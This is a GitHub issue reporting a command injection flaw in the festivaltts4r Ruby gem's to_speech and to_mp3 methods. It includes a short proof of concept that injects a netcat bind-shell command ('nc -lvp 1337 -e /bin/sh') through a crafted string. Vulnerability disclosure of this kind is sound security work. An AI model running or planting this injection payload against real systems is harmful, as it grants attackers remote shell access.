Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

Command Injection #1

Open
bcoles opened this issue Apr 22, 2016 · 0 comments
Open

Command Injection #1

bcoles opened this issue Apr 22, 2016 · 0 comments

Comments

@bcoles
Copy link

bcoles commented Apr 22, 2016

The to_speech and to_mp3 methods allow injection of arbitrary operating system commands. This may be problematic in the event user input is supplied to these methods.

Proof of concept:

#!/usr/bin/env ruby
require "rubygems"
require "festivaltts4r"

'";nc -lvp 1337 -e /bin/sh;echo "pwned'.to_speech
'";nc -lvp 1337 -e /bin/sh;echo "pwned'.to_mp3('something.mp3')
$ ./asdf.rb 
listening on [any] 1337 ...
# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@bcoles